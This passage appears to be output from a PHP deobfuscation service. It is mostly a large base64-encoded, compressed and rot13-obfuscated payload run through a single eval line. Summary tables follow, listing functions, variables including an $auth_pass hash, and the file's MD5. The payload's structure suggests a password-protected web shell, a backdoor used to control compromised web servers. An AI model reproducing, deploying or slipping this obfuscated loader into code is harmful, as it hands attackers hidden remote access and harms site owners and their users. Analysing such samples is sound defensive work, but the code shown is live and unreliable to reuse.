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';
eval(str_rot13(gzinflate(str_rot13(base64_decode(($code))))));
?>

Function Calls

gzinflate 1
str_rot13 2
base64_decode 1
session_start 1
set_time_limit 1
error_reporting 1

Variables

$code 7X37W9u40vDP7PPs/6BtZndrC1a49MatWCiB3gKETwvdvmzsYDsE6sRB4uLs..
$auth_pass cf457aba3113ceec64670783d5b02176

Stats

MD5 0f3db7c2ede7e1b4bf646a5c52a435d2
Eval Count 1
Decode Time 174 ms